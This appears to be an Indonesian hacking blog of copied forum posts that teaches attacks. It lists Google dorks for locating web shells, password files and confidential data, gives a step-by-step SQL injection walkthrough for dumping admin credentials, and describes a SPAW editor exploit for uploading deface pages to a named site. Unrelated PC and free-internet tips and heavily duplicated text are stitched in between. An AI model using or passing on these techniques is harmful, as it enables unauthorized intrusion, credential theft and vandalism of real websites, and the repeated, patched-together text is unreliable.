seperti halnya dengan r57shell, yang biasanya bertitle r57shell dan di dalamnya terdapat banyak tulisan r57shell, yang letaknya pada bagian fooder ( bagian paling bawah bawah ).
untuk mencarinya dengan google dengan mengetikan perintah :
intext:r57shell+http-shell filetype:php <<< bisa di rubah
artinya kita akan mencari file yang didalam sebuah dokumen yang memiliki/ada tulisan r57shell yang tipe filenya adalah php.
kalau jadinya lihat aja disini php shell
Selamat berkreasi dechh…
pointnya asal tauu aja gimana penjelasannya dan ngerti apa tujuannya… , kalau nggak ngertii ntar juga bakalan ngertiii….
untuk jelasnya neh dan lengkapnya coba aja baca di bawah ini, atau kalau nggak puas cari lagi di google, masih banyak kooo, hihihiihhhh
Tulisan di bawah ini diambil dari situsnya http://www.myraffaell.com
Based on: Dangerous Google – Searching for Secrets by:MichaĆ Piotrowski
Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.
dari tutorial ini yang akan didapatkan adalah:
* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
* Bagaimana cara mencari informasi tentang vulnerable systems and Web services
* Bagaimana cara mencari publicly available network devices.
Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya….
site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox —> akan mencari kata fox di situs google.com
intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire —> akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire
allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire —> akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire
inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire —> akan mencari kata fire di website yang url nya terdapat fox
allinurl
Sama dengan Allintitle (hanya ini url)
filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire —> akan mencari file PDF yang didalamnya terdapat kata fire
contoh keren: filetype:doc skripsi IT
numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire —> akan mencari range 1-100 yang terdapat kata fire
link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com —> akan mencari site site mana aja yang memiliki links ke google.com
inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire —> akan mencari web yang memiliki deskripsi fire
kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + “” ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )
nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database……
Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
“Apache/1.3.28 Server at” intitle:index.of
–> Apache 1.3.28
“Apache/2.0 Server at” intitle:index.of
–> Apache 2.0
“Apache/* Server at” intitle:index.of
–> semua versi dari Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
–> Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
–> semua versi dari Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
–> semua versi dari Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
–> semua versi dari IBM HTTP Server
“Netscape/* Server at” intitle:index.of
–> semua versi dari Netscape Server
“Red Hat Secure/*” intitle:index.of
–> semua versi dari the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
–> semua versi dari the HP server
Beberapa Bug pada Skripts dapat ditemukan google:
“Generated by phpSystem”
–> dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points
“This summary was generated by wwwstat”
–> web server statistics, system file structure
“These statistics were produced by getstats”
–>web server statistics, system file structure
“This report was generated by WebLog”
–>web server statistics, system file structure
intext:”Tobias Oetiker” “traffic analysis”
–>system performance statistics as MRTG charts, network configuration
intitle:”Apache::Status” (inurl:server-status | inurl:status.html | inurl:apache.html)
–>server version, operating system type, child process list,current connections
intitle:”ASP Stats Generator *.*” “
–>ASP Stats
Generator” “2003-2004 weppos”
–>web server activity, lots of visitor information
intitle:”Multimon UPS status page”
–>UPS device performance statistics
intitle:”statistics of” “advanced web statistics”
–>web server statistics, visitor information
intitle:”System Statistics” +”System and Network Information Center”
–>system performance statistics as MRTG charts, hardware configuration, running services
intitle:”Usage Statistics for” “Generated by Webalizer”
–>web server statistics, visitor information, system file structure
intitle:”Web Server Statistics for ****”
–>web server statistics, visitor information
inurl:”/axs/ax-admin.pl” -script
–>web server statistics, visitor information
inurl:”/cricket/grapher.cgi”
–>MRTG charts of network interface performance
inurl:server-info “Apache Server Information”
–>web server version and configuration, operating system type, system file structure
“Output produced by SysWatch *”
–>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs
Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.
“A syntax error has occurred” filetype:ihtml
–>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords
“Access denied for user” “Using password”
–>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code
“The script whose uid is ” “is not allowed to access”
–>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information
“ORA-00921: unexpected end of SQL command”
–>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information
“error found handling the request” cocoon filetype:xml
–>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information
“Invision Power Board Database Error”
–>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code
“Warning: mysql _ query()” “invalid query”
–>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information
“Error Message : Error loading required libraries.”
–>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information
“#mysql dump” filetype:sql
–>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents
Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google
“http://*:*@www”
site passwords for site, stored as the string
“http://username: password@www…” filetype:bak inurl:”htaccess|passwd|shadow|ht users”
file backups, berpotensial untuk mengambil user names and passwords
filetype:mdb inurl:”account|users|admin|administrators|passwd|password”
mdb files, berpotensial untuk mengambil password information
intitle:”Index of” pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
“Index of/” “Parent Directory” “WS _ http://FTP.ini” filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) “# -FrontPage-”
Terdapat Microsoft FrontPage passwords
filetype:sql (”passwd values ****” |”password values ****” | “pass values ****” )
Terdapat SQL code and passwords yang disimpan dalam a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:”wvdial.conf” intext:”password” configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information
intext:”powered by Web Wiz Journal”
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file – just enter http:///journal/journal.mdb instead of the default http:///journal/
“Powered by DUclassified” -site:duware.com
“Powered by DUcalendar” -site:duware.com
“Powered by DUdirectory” -site:duware.com
“Powered by DUclassmate” -site:duware.com
“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/
intext:”BiTBOARD v2.0″ “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php
Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information
“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs
“not for distribution”
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt “msn”
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers
intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail
“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net
untuk lebih kreatifnya bisa di coba coba sendiri, okeh
reference:
* http://johnny.ihackstuff.com – largest repository of data on Google hacking,
* http://insecure.org/nmap/ – Nmap network scanner,
* http://thc.org/thc-amap/ – amap network scanner.
http://hacker-newbie.org/showthread.php?tid=11520
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Tampilkan postingan dengan label Tutorial. Tampilkan semua postingan
Sabtu, 17 Desember 2011
Rabu, 07 Desember 2011
My SQL Injection Step by Step
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
http://hacker-newbie.org/showthread.php?tid=97
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
http://hacker-newbie.org/showthread.php?tid=97
Selasa, 06 Desember 2011
Tutorial Deface Asp
google dork : inurl:"spaw2/uploads/files/"
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voVjlBhRGc92ITAlR0hxCcdAyhnctffI2PHV0tlQtySrRrGi4WKTXoggIbp--tEDgnCnD8IsJTILaFtQkxFnUuoFhoRdkgf9jw_BduRaiDs9fQ-3RUl5pdW_gYh_qEb0SoqVd_4FybzZAt_YNwr2OTUvBQE_dmY2o_z-FLvtnOLLyYG2ZDYlJmYdY=s0-d)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUlGz6H46nXpGnAu4sZzsM0LEhLByDQan1WYceWjlBjY8P_Ur5Z-vkyziMEMlhIOad-m-eOY2bGihgB2kkX8Ws2kBxoYW7uKY1ASoc8KMZV2yXhm8W76up9zo91f6KwcgZPWLQ7dw3yze3URbi_RuAkKapkX9gj0LdB9TqkbXfXnTPmPPMFwppzGuG=s0-d)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s7qh-G8kw6ULF1Dx3WxAEqrwkO45JdylA1AjkFrrraeppt3uqeMpmdiQeUrfsYbK9xrIaHvrXUrUyZIGgvwsQ_h-Q6EIV0VwvxYPgS1WKWW4RH6-G5lwWciKZ32L2uV_9XW91d9ZPBBUZqZpn-E4fNuEQ6KB7VcVRkxlOXAWbszUz0vRp_F9TFLHYy=s0-d)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_voMsgCIid39yYLu2xMEDQdGdWyHpCkvhScFz6eYU3ZjlR-TVZYVdVUJGWXjarMBdcgrDQEZwmG34usFw6Z56IauecaydefZl3hH1fjsIG2NgZdflIZFS9GozxEe5kS4bdB1Ag_B45m4vdQtm8AqlSCZTAk1Jtoos6qJoS3VOr-A8EXKHYLA1c4DUEj=s0-d)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vzqT-pBlv2WsW1OKPyxvJ-vv3_196SoOywkEbrsFbTHZCxhyBJqvWd37irvhkMGCq1lrmBHQulLtsaeN3LxJnG9gUXCO4ZUgggIwEIV7ZbuMpM44JK-Zq1yEeDSOi_rBMXVQ3QakhTycQq0B0s5reucXzlL0TXsbYg-u6IxGwHkVd9PJFtJuY0FSFN=s0-d)
semoga sukses
http://medancyberteam.web.id/forum/showthread.php?tid=27
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
kemudian upload
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
dan berikut hasil dari kerjaan diatas td :)
semoga sukses
http://medancyberteam.web.id/forum/showthread.php?tid=27
Senin, 05 Desember 2011
Menjadikan RAM/Flashdisk memperbesar VGA
Dengan menggunakan tool 3D Analyze ini dpt meningkatkan kinerja VGA komputer kita.
Jadi tool ini sangat cocok buat ente2 yang ingin bermain game yg mempunyai performa grafik yang tinggi tapi kita tak harus mempunyai komputer yang canggih.
contoh gamblangnya kayak gini...!
Ente mempunyai spesifikasi komputer sebagai berikut :
1GB DDR RAM
Pentium 4 (2.4 GHz)
Onboard Graphics Card (Intel) with 64 MB graphics memory
jika ente pake 3D Analyze (Virtual Graphics Emulator) bakalan jadi kek gini:
1GB DDR RAM
Pentium 4 (2.4 Ghz)
NVIDIA GeForce FX 5900 Ultra with 128 MB graphics memory.
Apa yang berubah masbro??? udah pada tau kan?? Okelah kalau begitu, kita lanjut cara pakainya...!
1. Jalankan aplikasi 3D Analyze yang sudah ente download.
2. Cari file game yang akan ente mainkan dengan meng-klik menu SELECT. Bila sudah klik Open.
3. Kemudian setting HARDWARE LIMITS(cap bits) Dicentang Semuanya ya..
4. Seting pixel and vertex shader. yang dicentang > force max.pixel shader version 1.4
> force high precision pixel shader
> save shader to file (shaders out)
5. Setting ANTI DETECT MODE centang keduanya
6. Bila sudah, jangan lupa klik save batch file
7. Selesai
Jadi intinya software ini bekerja dengan cara mengambil memory RAM kemudian dijadikan virtual VGA.
download barangnya DISINI
http://hacker-newbie.org/showthread.php?tid=9976
Jadi tool ini sangat cocok buat ente2 yang ingin bermain game yg mempunyai performa grafik yang tinggi tapi kita tak harus mempunyai komputer yang canggih.
contoh gamblangnya kayak gini...!
Ente mempunyai spesifikasi komputer sebagai berikut :
1GB DDR RAM
Pentium 4 (2.4 GHz)
Onboard Graphics Card (Intel) with 64 MB graphics memory
jika ente pake 3D Analyze (Virtual Graphics Emulator) bakalan jadi kek gini:
1GB DDR RAM
Pentium 4 (2.4 Ghz)
NVIDIA GeForce FX 5900 Ultra with 128 MB graphics memory.
Apa yang berubah masbro??? udah pada tau kan?? Okelah kalau begitu, kita lanjut cara pakainya...!
1. Jalankan aplikasi 3D Analyze yang sudah ente download.
2. Cari file game yang akan ente mainkan dengan meng-klik menu SELECT. Bila sudah klik Open.
3. Kemudian setting HARDWARE LIMITS(cap bits) Dicentang Semuanya ya..
4. Seting pixel and vertex shader. yang dicentang > force max.pixel shader version 1.4
> force high precision pixel shader
> save shader to file (shaders out)
5. Setting ANTI DETECT MODE centang keduanya
6. Bila sudah, jangan lupa klik save batch file
7. Selesai
Jadi intinya software ini bekerja dengan cara mengambil memory RAM kemudian dijadikan virtual VGA.
download barangnya DISINI
http://hacker-newbie.org/showthread.php?tid=9976
Internet Gratis di 3 (Three) For PC
Bagi yang mau Internetan gratis dengan kartu 3 di PC
Silahkan download applikasi ini :)
Download : http://www.mediafire.com/?hbhjx1l38uz5h6c
pass : www.game-zone-indonesia.blogspot.com
![[Image: captureuha.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sbFU4xY_pPYFKFDIMf3fEQ-jDP5Cvv2jKheuuJx69yv_p6MyAPrfPwloE-8Du71mpoGdv6uz5Q0ccjRE43JceRsvYwAc4DQur0zJDR6NpeXKa0iAXN-g=s0-d)
NB : Biar gag ketendang ( DC )
- Start
- Run
- ktik services.msc
- DISABLE propertiesnya:
* DHCP CLIENT
* DNS CLIENT
* IPSEC
* NETWORK LOCATION AWARENESS (NLA)
* SSDP
* WINDOWS TIME
* WORK STATION
.
- UNCHECK use default gateway
dial up > properties > Networking > properties > Advanced > UNCHECK use default gateway
http://hacker-newbie.org/showthread.php?tid=11290
Silahkan download applikasi ini :)
Download : http://www.mediafire.com/?hbhjx1l38uz5h6c
pass : www.game-zone-indonesia.blogspot.com
NB : Biar gag ketendang ( DC )
- Start
- Run
- ktik services.msc
- DISABLE propertiesnya:
* DHCP CLIENT
* DNS CLIENT
* IPSEC
* NETWORK LOCATION AWARENESS (NLA)
* SSDP
* WINDOWS TIME
* WORK STATION
.
- UNCHECK use default gateway
dial up > properties > Networking > properties > Advanced > UNCHECK use default gateway
http://hacker-newbie.org/showthread.php?tid=11290
Senin, 31 Oktober 2011
Penangkal Netcut
bagi yg lagi main wifi dan tiba" koneksi internet gk ada karena ada salah satu pengguna jaringan yg mngunakan netcut,,,
ane punya cara ampuh tuk mengatasinya,,,
dengan mnggunakan software buatan arcai netcut defender,,,
![[Image: about+arcai.com%2527s+netcut-defender+2....8%255D.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvBtXhG7D1gAP_WQKFSjJsBjFgYVrAOw9GDMW1v9xNXuVKD3pyXv7kvIHV4u-BtURxDyx4l5gTqMm5fgTiTX7Dg2gfK5KNxRXdG2tY1JfzhEnVAHv3OyOauGilgT-L-eX64uaUHps5YokD/s1600/about+arcai.com%2527s+netcut-defender+2.1.1%255B8%255D.png)
download langsung aja kesini,,,
http://arcai.com/netcut-defender-faq/ite...nload.html
sekian dulu dari ane mas bro,,,,
ane punya cara ampuh tuk mengatasinya,,,
dengan mnggunakan software buatan arcai netcut defender,,,
![[Image: about+arcai.com%2527s+netcut-defender+2....8%255D.png]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvBtXhG7D1gAP_WQKFSjJsBjFgYVrAOw9GDMW1v9xNXuVKD3pyXv7kvIHV4u-BtURxDyx4l5gTqMm5fgTiTX7Dg2gfK5KNxRXdG2tY1JfzhEnVAHv3OyOauGilgT-L-eX64uaUHps5YokD/s1600/about+arcai.com%2527s+netcut-defender+2.1.1%255B8%255D.png)
download langsung aja kesini,,,
http://arcai.com/netcut-defender-faq/ite...nload.html
sekian dulu dari ane mas bro,,,,
Merubah Nama Prosesor
Bisa digunakan jika kamu ingin mengelabui teman agar mengira seolah2 komputermu adalah Core i7 misalnya,tetapi padahal PC mu adalah pentium 4,3 bahkan 2

Caranya :
1. Masuk ke registry editor kamu ( Start ---> Run ---> Ketik regedit )
2. Masuk ke registry berikut
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\0\
atau
HKEY_LOCAL_MACHINE\HARDWARE\DISCRIPTION\System\Cen tralProcessor\1\
3. Cari key dengan nama ProcessorNameString
4. Klik kanan key tersebut lalu pilih Modify dan ubah Value Data tersebut sesuai keinginanmu (Contoh : Intel Pentium Dual CPU E2200 @ 2.20GHz atau yang lain).
lihat perubahannya di System Properties (klik kanan icon My Computer dan pilih Properties ).
untuk mengembalikannya masuk ke lokasi tadi,ubah nama seperti semula..
selamat mencoba dan Belajar
Caranya :
1. Masuk ke registry editor kamu ( Start ---> Run ---> Ketik regedit )
2. Masuk ke registry berikut
